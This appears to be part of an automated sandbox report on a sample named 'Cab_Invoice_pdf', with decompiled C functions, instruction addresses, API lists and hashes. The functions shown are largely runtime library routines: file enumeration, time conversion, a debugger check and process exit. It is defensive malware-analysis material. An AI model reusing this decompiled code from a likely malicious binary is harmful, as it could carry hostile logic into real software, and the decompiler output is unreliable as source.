								if(WideCharToMultiByte(_t95, 0, 0x1346584, 0xffffffff,  *_t98, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t98) = 0;
								} else {
									( *_t98)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t95, 0, 0x13465d8, 0xffffffff, _t98[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t98[1]) = 0;
								} else {
									_t98[1][0x3f] = 0;
								}
							}
							 *(E0132ABF6()) = _v8;
							 *(E0132ABEA()) = _v12;
							_t60 = E0132ABF0();
							 *_t60 = _v16;
							return _t60;
						}
					}
				}
			}








































                            0x0132b1a2
                            0x0132b1a9
                            0x0132b1ad
                            0x0132b1b0
                            0x0132b1b3
                            0x0132b1b8
                            0x0132b1bb
                            0x0132b2e3
                            0x0132b2e3
                            0x0132b2e4
                            0x0132b2e5
                            0x0132b2e6
                            0x0132b2e7
                            0x0132b2e8
                            0x0132b2ed
                            0x0132b2f1
                            0x0132b2f9
                            0x0132b300
                            0x0132b303
                            0x0132b310
                            0x0132b317
                            0x0132b318
                            0x0132b31a
                            0x0132b31f
                            0x0132b32e
                            0x0132b335
                            0x0132b33d
                            0x0132b33f
                            0x0132b349
                            0x0132b34c
                            0x0132b359
                            0x0132b35c
                            0x0132b35e
                            0x0132b377
                            0x0132b37f
                            0x0132b381
                            0x0132b387
                            0x0132b38c
                            0x0132b383
                            0x0132b383
                            0x00000000
                            0x0132b383
                            0x0132b360
                            0x0132b360
                            0x0132b361
                            0x0132b361
                            0x0132b361
                            0x0132b38e
                            0x0132b341
                            0x0132b341
                            0x0132b341
                            0x0132b39b
                            0x0132b39d
                            0x0132b39f
                            0x0132b3a1
                            0x0132b3b1
                            0x0132b3b1
                            0x0132b3a3
                            0x0132b3a3
                            0x0132b3a6
                            0x00000000
                            0x0132b3a8
                            0x0132b3a8
                            0x0132b3a9
                            0x0132b3ae
                            0x0132b3a6
                            0x0132b3b7
                            0x0132b3c2
                            0x0132b3c5
                            0x0132b3cd
                            0x0132b1c1
                            0x0132b1c5
                            0x0132b1ca
                            0x0132b1cd
                            0x00000000
                            0x0132b1d3
                            0x0132b1d7
                            0x0132b1dc
                            0x0132b1df
                            0x00000000
                            0x0132b1e5
                            0x0132b1eb
                            0x0132b1f0
                            0x0132b1f6
                            0x0132b206
                            0x0132b20c
                            0x0132b213
                            0x0132b219
                            0x0132b21d
                            0x0132b223
                            0x0132b226
                            0x0132b22d
                            0x0132b234
                            0x0132b234
                            0x0132b237
                            0x0132b23e
                            0x0132b256
                            0x0132b256
                            0x0132b259
                            0x0132b240
                            0x0132b240
                            0x0132b247
                            0x00000000
                            0x0132b249
                            0x0132b24b
                            0x0132b251
                            0x0132b251
                            0x0132b247
                            0x0132b261
                            0x0132b27d
                            0x0132b28d
                            0x0132b284
                            0x0132b286
                            0x0132b286
                            0x0132b2ab
                            0x0132b2bd
                            0x0132b2b2
                            0x0132b2b5
                            0x0132b2b5
                            0x0132b2ab
                            0x0132b2c7
                            0x0132b2d1
                            0x0132b2d6
                            0x0132b2db
                            0x0132b2e2
                            0x0132b2e2
                            0x0132b1df
                            0x0132b1cd

                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01339410), ref: 0132B1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,01346584,000000FF,00000000,0000003F,00000000,?,?), ref: 0132B275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,013465D8,000000FF,?,0000003F,00000000,?), ref: 0132B2A2
                            • _free.LIBCMT ref: 0132B1EB
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 0132B3B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID:
                            • API String ID: 1286116820-0
                            • Opcode ID: 629bdeb8c1ca9b598d22d1f139e53c6eaced5abf6ea478bc2e3a3ebb899d2797
                            • Instruction ID: 61c5e3984a63fa54aa86512a1a33a2db4d23e01a647ed48bdde910497867aebe
                            • Opcode Fuzzy Hash: 629bdeb8c1ca9b598d22d1f139e53c6eaced5abf6ea478bc2e3a3ebb899d2797
                            • Instruction Fuzzy Hash: 4451EAB1900329DBDB24FF6D9D4196EFBBCEF46358F10426AE514D3148EB309A40CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131E260, Relevance: 6.2, APIs: 4, Instructions: 196fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E0131E260(void* __ebx, signed int __edx, void* __edi, void* __esi, WCHAR* _a4, signed int* _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				char _v556;
				char _v580;
				char _v588;
				char _v596;
				struct _WIN32_FIND_DATAW _v604;
				signed int* _v632;
				void* _v636;
				signed int _v648;
				FILETIME* _v1260;
				signed int _v1272;
				signed int _t54;
				WCHAR* _t56;
				signed int _t59;
				signed int _t65;
				signed int _t66;
				signed int _t67;
				void* _t71;
				signed int _t73;
				void* _t75;
				signed int _t77;
				signed int _t78;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t92;
				FILETIME* _t94;
				signed int _t95;
				long _t104;
				long _t105;
				signed int _t106;
				signed int _t119;
				signed int _t122;
				signed int* _t125;
				signed int* _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				signed int _t132;
				void* _t134;
				signed int _t135;
				void* _t136;
				signed int _t137;

				_t119 = __edx;
				_t54 =  *0x133c008; // 0xa3433343
				_v8 = _t54 ^ _t131;
				_t56 = _a4;
				_push(__esi);
				_t125 = _a8;
				if(_t125 != 0) {
					if(_t56 == 0) {
						goto L1;
					} else {
						_push(__ebx);
						_t122 = FindFirstFileExW(_t56, 0,  &(_v604.ftCreationTime), 0, 0, 0);
						if(_t122 != 0xffffffff) {
							asm("sbb eax, eax");
							 *_t125 =  ~(_v604.ftCreationTime + 0xffffff80) & _v604.ftCreationTime;
							_t65 =  &_v596;
							_push(_t65);
							L33();
							_t125[2] = _t65;
							_t66 =  &_v588;
							_push(_t66);
							_t125[3] = _t119;
							L33();
							_t125[4] = _t66;
							_t67 =  &_v580;
							_push(_t67);
							_t125[5] = _t119;
							L33();
							_t125[6] = _t67;
							_t125[8] = _v604.dwReserved0;
							_t125[7] = _t119;
							_t71 = E0132618C( &(_t125[9]), 0x104,  &_v556);
							_t135 = _t134 + 0x18;
							if(_t71 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E01321798();
								asm("int3");
								_push(_t131);
								_t132 = _t135;
								_t136 = _t135 - 0x254;
								_t73 =  *0x133c008; // 0xa3433343
								_v648 = _t73 ^ _t132;
								_t75 = _v636;
								_push(_t125);
								_t127 = _v632;
								if(_t75 != 0) {
									if(_t75 == 0xffffffff || _t127 == 0) {
										goto L18;
									} else {
										if(FindNextFileW(_t75,  &_v604) != 0) {
											asm("sbb eax, eax");
											 *_t127 =  ~(_v604.dwFileAttributes + 0xffffff80) & _v604.dwFileAttributes;
											_t84 =  &(_v604.ftCreationTime);
											_push(_t84);
											L33();
											_t127[2] = _t84;
											_t85 =  &(_v604.ftLastAccessTime);
											_push(_t85);
											_t127[3] = _t119;
											L33();
											_t127[4] = _t85;
											_t86 =  &(_v604.ftLastWriteTime);
											_push(_t86);
											_t127[5] = _t119;
											L33();
											_t127[6] = _t86;
											_t127[8] = _v604.nFileSizeLow;
											_t127[7] = _t119;
											_t78 = E0132618C( &(_t127[9]), 0x104,  &(_v604.cFileName));
											_t137 = _t136 + 0x18;
											if(_t78 == 0) {
												goto L20;
											} else {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E01321798();
												asm("int3");
												_push(_t132);
												_t92 =  *0x133c008; // 0xa3433343
												_v1272 = _t92 ^ _t137;
												_t94 = _v1260;
												if(_t94->dwLowDateTime != 0 || _t94->dwHighDateTime != 0) {
													_t94 = FileTimeToSystemTime(_t94,  &_v48);
													if(_t94 == 0) {
														goto L35;
													} else {
														_t94 = SystemTimeToTzSpecificLocalTime(0,  &_v48,  &_v32);
														if(_t94 == 0) {
															goto L35;
														} else {
															_push(0xffffffff);
															_push(_v32.wSecond & 0x0000ffff);
															_t95 = E013256B5(0, _t119, _t127, _v32.wYear & 0x0000ffff, _v32.wMonth & 0x0000ffff, _v32.wDay & 0x0000ffff, _v32.wHour & 0x0000ffff, _v32.wMinute & 0x0000ffff);
														}
													}
												} else {
													L35:
													_t95 = _t94 | 0xffffffff;
												}
												E0131786A();
												return _t95;
											}
										} else {
											_t104 = GetLastError();
											_t129 = 2;
											if(_t104 < _t129) {
												L28:
												_t77 = E0131C9CE();
												 *_t77 = 0x16;
												goto L19;
											} else {
												if(_t104 <= 3) {
													L30:
													_t77 = E0131C9CE();
													 *_t77 = _t129;
													goto L19;
												} else {
													if(_t104 == 8) {
														_t77 = E0131C9CE();
														 *_t77 = 0xc;
														goto L19;
													} else {
														if(_t104 == 0x12) {
															goto L30;
														} else {
															goto L28;
														}
													}
												}
											}
										}
									}
								} else {
									L18:
									 *((intOrPtr*)(E0131C9CE())) = 0x16;
									_t77 = E01321788();
									L19:
									_t78 = _t77 | 0xffffffff;
									L20:
									E0131786A();
									return _t78;
								}
							} else {
								_t59 = _t122;
								goto L10;
							}
						} else {
							_t105 = GetLastError();
							_t130 = 2;
							if(_t105 < _t130) {
								L8:
								_t106 = E0131C9CE();
								 *_t106 = 0x16;
							} else {
								if(_t105 <= 3) {
									L13:
									_t106 = E0131C9CE();
									 *_t106 = _t130;
								} else {
									if(_t105 == 8) {
										_t106 = E0131C9CE();
										 *_t106 = 0xc;
									} else {
										if(_t105 == 0x12) {
											goto L13;
										} else {
											goto L8;
										}
									}
								}
							}
							_t59 = _t106 | 0xffffffff;
							L10:
							goto L11;
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E0131C9CE())) = 0x16;
					_t59 = E01321788() | 0xffffffff;
					L11:
					E0131786A();
					return _t59;
				}
			}


















































                            0x0131e260
                            0x0131e26b
                            0x0131e272
                            0x0131e275
                            0x0131e278
                            0x0131e279
                            0x0131e27e
                            0x0131e297
                            0x00000000
                            0x0131e299
                            0x0131e299
                            0x0131e2af
                            0x0131e2b4
                            0x0131e312
                            0x0131e31a
                            0x0131e31c
                            0x0131e322
                            0x0131e323
                            0x0131e328
                            0x0131e32b
                            0x0131e331
                            0x0131e332
                            0x0131e335
                            0x0131e33a
                            0x0131e33d
                            0x0131e343
                            0x0131e344
                            0x0131e347
                            0x0131e34c
                            0x0131e355
                            0x0131e362
                            0x0131e36b
                            0x0131e370
                            0x0131e375
                            0x0131e37e
                            0x0131e37f
                            0x0131e380
                            0x0131e381
                            0x0131e382
                            0x0131e383
                            0x0131e388
                            0x0131e38b
                            0x0131e38c
                            0x0131e38e
                            0x0131e394
                            0x0131e39b
                            0x0131e39e
                            0x0131e3a1
                            0x0131e3a2
                            0x0131e3a7
                            0x0131e3ce
                            0x00000000
                            0x0131e3d4
                            0x0131e3e4
                            0x0131e430
                            0x0131e438
                            0x0131e43a
                            0x0131e440
                            0x0131e441
                            0x0131e446
                            0x0131e449
                            0x0131e44f
                            0x0131e450
                            0x0131e453
                            0x0131e458
                            0x0131e45b
                            0x0131e461
                            0x0131e462
                            0x0131e465
                            0x0131e46a
                            0x0131e473
                            0x0131e480
                            0x0131e489
                            0x0131e48e
                            0x0131e493
                            0x00000000
                            0x0131e499
                            0x0131e49b
                            0x0131e49c
                            0x0131e49d
                            0x0131e49e
                            0x0131e49f
                            0x0131e4a0
                            0x0131e4a5
                            0x0131e4a8
                            0x0131e4ae
                            0x0131e4b5
                            0x0131e4b8
                            0x0131e4be
                            0x0131e4d2
                            0x0131e4da
                            0x00000000
                            0x0131e4dc
                            0x0131e4e6
                            0x0131e4ee
                            0x00000000
                            0x0131e4f0
                            0x0131e4f4
                            0x0131e4f6
                            0x0131e510
                            0x0131e515
                            0x0131e4ee
                            0x0131e4c6
                            0x0131e4c6
                            0x0131e4c6
                            0x0131e4c9
                            0x0131e51d
                            0x0131e525
                            0x0131e525
                            0x0131e3e6
                            0x0131e3e6
                            0x0131e3ee
                            0x0131e3f1
                            0x0131e402
                            0x0131e402
                            0x0131e407
                            0x00000000
                            0x0131e3f3
                            0x0131e3f6
                            0x0131e41c
                            0x0131e41c
                            0x0131e421
                            0x00000000
                            0x0131e3f8
                            0x0131e3fb
                            0x0131e40f
                            0x0131e414
                            0x00000000
                            0x0131e3fd
                            0x0131e400
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131e400
                            0x0131e3fb
                            0x0131e3f6
                            0x0131e3f1
                            0x0131e3e4
                            0x0131e3a9
                            0x0131e3a9
                            0x0131e3ae
                            0x0131e3b4
                            0x0131e3b9
                            0x0131e3b9
                            0x0131e3bc
                            0x0131e3c2
                            0x0131e3ca
                            0x0131e3ca
                            0x0131e377
                            0x0131e377
                            0x00000000
                            0x0131e377
                            0x0131e2b6
                            0x0131e2b6
                            0x0131e2be
                            0x0131e2c1
                            0x0131e2d2
                            0x0131e2d2
                            0x0131e2d7
                            0x0131e2c3
                            0x0131e2c6
                            0x0131e2fe
                            0x0131e2fe
                            0x0131e303
                            0x0131e2c8
                            0x0131e2cb
                            0x0131e2f1
                            0x0131e2f6
                            0x0131e2cd
                            0x0131e2d0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131e2d0
                            0x0131e2cb
                            0x0131e2c6
                            0x0131e2dd
                            0x0131e2e0
                            0x00000000
                            0x0131e2e1
                            0x0131e2b4
                            0x0131e280
                            0x0131e280
                            0x0131e285
                            0x0131e290
                            0x0131e2e2
                            0x0131e2e8
                            0x0131e2f0
                            0x0131e2f0

                            APIs
                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0131E2A9
                            • GetLastError.KERNEL32 ref: 0131E2B6
                              • Part of subcall function 0131E4A6: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,0131E328,?), ref: 0131E4D2
                              • Part of subcall function 0131E4A6: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,0131E328,?,?,?,?,0131E328,?), ref: 0131E4E6
                            • FindNextFileW.KERNEL32(?,?,?), ref: 0131E3DC
                            • GetLastError.KERNEL32 ref: 0131E3E6
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Time$File$ErrorFindLastSystem$FirstLocalNextSpecific
                            • String ID:
                            • API String ID: 3693236040-0
                            • Opcode ID: 2c66bcd9672676ba3154a3e5d32477463e86a6f48e6baab1ffc9e53c955eb436
                            • Instruction ID: f873d4738913eaf9a1c2ae63fefe330f0c6efaf0fd50cc1f0d29a19ebbd97c76
                            • Opcode Fuzzy Hash: 2c66bcd9672676ba3154a3e5d32477463e86a6f48e6baab1ffc9e53c955eb436
                            • Instruction Fuzzy Hash: 6861F7719006199FD73AAF7CCC84AAAB7E8EF45328F000A79E916D7284DB35D9448B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013215BE, Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 84%
                            			E013215BE(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x133c008; // 0xa3433343
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E013182AC(_t41);
					_pop(_t60);
				}
				E01318520(_t65,  &_v804, 0, 0x50);
				E01318520(_t65,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x1b
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -785
				_t57 = UnhandledExceptionFilter(_t36);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E013182AC(_t57);
				}
				E0131786A();
				return _t57;
			}







































                            0x013215be
                            0x013215be
                            0x013215be
                            0x013215c9
                            0x013215ce
                            0x013215d0
                            0x013215d7
                            0x013215d8
                            0x013215da
                            0x013215dd
                            0x013215e2
                            0x013215e2
                            0x013215ee
                            0x01321601
                            0x0132160f
                            0x01321615
                            0x0132161b
                            0x01321621
                            0x01321627
                            0x0132162d
                            0x01321633
                            0x01321639
                            0x0132163f
                            0x01321645
                            0x0132164c
                            0x01321653
                            0x0132165a
                            0x01321661
                            0x01321668
                            0x0132166f
                            0x01321670
                            0x01321679
                            0x0132167f
                            0x0132167f
                            0x01321682
                            0x01321688
                            0x01321695
                            0x0132169e
                            0x013216a7
                            0x013216b0
                            0x013216be
                            0x013216c0
                            0x013216c6
                            0x013216cd
                            0x013216d5
                            0x013216e1
                            0x013216e4
                            0x013216e9
                            0x013216f0
                            0x013216f8

                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 013216B6
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 013216C0
                            • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 013216CD
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 884016d0e8547b3095cc728c1368bc0a2a2560fb24b51bc6128011fe38af4ed9
                            • Instruction ID: 18383a33312d676970b3c353f1531b53c455d62876f7251cf4cbeb978e113bf8
                            • Opcode Fuzzy Hash: 884016d0e8547b3095cc728c1368bc0a2a2560fb24b51bc6128011fe38af4ed9
                            • Instruction Fuzzy Hash: 2531C67590122D9BCB25DF68D988BCDBBB8FF18314F5042DAE81CA7250E7709B858F45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01320158, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01320158(int _a4) {
				void* _t14;

				if(E01323A8A(_t14) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E013201DD(_t14, _a4);
				ExitProcess(_a4);
			}




                            0x01320164
                            0x01320180
                            0x01320180
                            0x01320189
                            0x01320192

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002,00000000), ref: 01320179
                            • TerminateProcess.KERNEL32(00000000,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002,00000000), ref: 01320180
                            • ExitProcess.KERNEL32 ref: 01320192
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: c5027ed000ffbcc3f786a3aec6cc6476c239671b7c3fb9759d7fc9a5cf38d072
                            • Instruction ID: 06896e1702366cf5f53ceec0d91dfc956be6d9ca58e51b5cafefabc1b97dcd90
                            • Opcode Fuzzy Hash: c5027ed000ffbcc3f786a3aec6cc6476c239671b7c3fb9759d7fc9a5cf38d072
                            • Instruction Fuzzy Hash: 9FE0EC35400158AFDF2A7F58E948A597F7DFF54785F140414F9059A121CB39E946CB84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132715E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                            Download Yara Rule
                            C-Code - Quality: 74%
                            			E0132715E(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				signed int _v32;
				WCHAR* _v36;
				signed int _v48;
				intOrPtr _v556;
				intOrPtr _v558;
				struct _WIN32_FIND_DATAW _v604;
				intOrPtr* _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _v644;
				intOrPtr _v648;
				void* __edi;
				signed int _t40;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				signed int _t51;
				signed char _t53;
				signed int _t62;
				void* _t64;
				union _FINDEX_INFO_LEVELS _t66;
				union _FINDEX_INFO_LEVELS _t67;
				signed int _t70;
				intOrPtr* _t71;
				signed int _t74;
				void* _t80;
				void* _t82;
				signed int _t83;
				void* _t87;
				WCHAR* _t88;
				intOrPtr* _t92;
				intOrPtr _t95;
				void* _t97;
				signed int _t98;
				intOrPtr* _t102;
				signed int _t105;
				void* _t108;
				intOrPtr _t109;
				void* _t110;
				void* _t112;
				void* _t113;
				signed int _t115;
				void* _t116;
				union _FINDEX_INFO_LEVELS _t117;
				void* _t121;
				void* _t122;
				void* _t123;
				signed int _t124;
				void* _t125;
				signed int _t130;
				void* _t131;
				signed int _t132;
				void* _t133;
				void* _t134;

				_push(__ecx);
				_t92 = _a4;
				_t2 = _t92 + 2; // 0x2
				_t108 = _t2;
				do {
					_t40 =  *_t92;
					_t92 = _t92 + 2;
				} while (_t40 != 0);
				_t115 = _a12;
				_t95 = (_t92 - _t108 >> 1) + 1;
				_v8 = _t95;
				if(_t95 <= (_t40 | 0xffffffff) - _t115) {
					_t5 = _t115 + 1; // 0x1
					_t87 = _t5 + _t95;
					_t122 = E01320B10(_t95, _t87, 2);
					_t97 = _t121;
					__eflags = _t115;
					if(_t115 == 0) {
						L6:
						_push(_v8);
						_t87 = _t87 - _t115;
						_t45 = E01326F6E(_t97, _t122 + _t115 * 2, _t87, _a4);
						_t132 = _t131 + 0x10;
						__eflags = _t45;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t80 = E013273D7(_a16, __eflags, _t122);
							E013209EB(0);
							_t82 = _t80;
							goto L8;
						}
					} else {
						_push(_t115);
						_t83 = E01326F6E(_t97, _t122, _t87, _a8);
						_t132 = _t131 + 0x10;
						__eflags = _t83;
						if(_t83 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E01321798();
							asm("int3");
							_t130 = _t132;
							_t133 = _t132 - 0x260;
							_t48 =  *0x133c008; // 0xa3433343
							_v48 = _t48 ^ _t130;
							_t109 = _v28;
							_t98 = _v32;
							_push(_t87);
							_t88 = _v36;
							_push(_t122);
							_push(_t115);
							_t123 = 0x5c;
							_v644 = _t109;
							_v648 = 0x2f;
							_t116 = 0x3a;
							while(1) {
								__eflags = _t98 - _t88;
								if(_t98 == _t88) {
									break;
								}
								_t50 =  *_t98 & 0x0000ffff;
								__eflags = _t50 - _v612;
								if(_t50 != _v612) {
									__eflags = _t50 - _t123;
									if(_t50 != _t123) {
										__eflags = _t50 - _t116;
										if(_t50 != _t116) {
											_t98 = _t98 - 2;
											__eflags = _t98;
											continue;
										}
									}
								}
								break;
							}
							_t124 =  *_t98 & 0x0000ffff;
							__eflags = _t124 - _t116;
							if(_t124 != _t116) {
								L19:
								_t51 = _t124;
								_t117 = 0;
								_t110 = 0x2f;
								__eflags = _t51 - _t110;
								if(_t51 == _t110) {
									L23:
									_t53 = 1;
									__eflags = 1;
								} else {
									_t112 = 0x5c;
									__eflags = _t51 - _t112;
									if(_t51 == _t112) {
										goto L23;
									} else {
										_t113 = 0x3a;
										__eflags = _t51 - _t113;
										if(_t51 == _t113) {
											goto L23;
										} else {
											_t53 = 0;
										}
									}
								}
								_t101 = (_t98 - _t88 >> 1) + 1;
								asm("sbb eax, eax");
								_v612 =  ~(_t53 & 0x000000ff) & (_t98 - _t88 >> 0x00000001) + 0x00000001;
								E01318520(_t117,  &_v604, _t117, 0x250);
								_t134 = _t133 + 0xc;
								_t125 = FindFirstFileExW(_t88, _t117,  &_v604, _t117, _t117, _t117);
								__eflags = _t125 - 0xffffffff;
								if(_t125 != 0xffffffff) {
									_t102 = _v608;
									_t62 =  *((intOrPtr*)(_t102 + 4)) -  *_t102;
									__eflags = _t62;
									_v616 = _t62 >> 2;
									_t64 = 0x2e;
									do {
										__eflags = _v604.cFileName - _t64;
										if(_v604.cFileName != _t64) {
											L36:
											_push(_t102);
											_t66 = E0132715E(_t102,  &(_v604.cFileName), _t88, _v612);
											_t134 = _t134 + 0x10;
											__eflags = _t66;
											if(_t66 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											__eflags = _v558 - _t117;
											if(_v558 == _t117) {
												goto L37;
											} else {
												__eflags = _v558 - _t64;
												if(_v558 != _t64) {
													goto L36;
												} else {
													__eflags = _v556 - _t117;
													if(_v556 == _t117) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t70 = FindNextFileW(_t125,  &_v604);
										_t102 = _v608;
										__eflags = _t70;
										_t64 = 0x2e;
									} while (_t70 != 0);
									_t71 = _t102;
									_t105 = _v616;
									_t111 =  *_t71;
									_t74 =  *((intOrPtr*)(_t71 + 4)) -  *_t71 >> 2;
									__eflags = _t105 - _t74;
									if(_t105 != _t74) {
										E0132C480(_t111 + _t105 * 4, _t74 - _t105, 4, E01326F79);
									}
								} else {
									_push(_v608);
									_t66 = E0132715E(_t101, _t88, _t117, _t117);
									L26:
									_t117 = _t66;
								}
								__eflags = _t125 - 0xffffffff;
								if(_t125 != 0xffffffff) {
									FindClose(_t125);
								}
								_t67 = _t117;
							} else {
								__eflags = _t98 -  &(_t88[1]);
								if(_t98 ==  &(_t88[1])) {
									goto L19;
								} else {
									_push(_t109);
									_t67 = E0132715E(_t98, _t88, 0, 0);
								}
							}
							__eflags = _v12 ^ _t130;
							E0131786A();
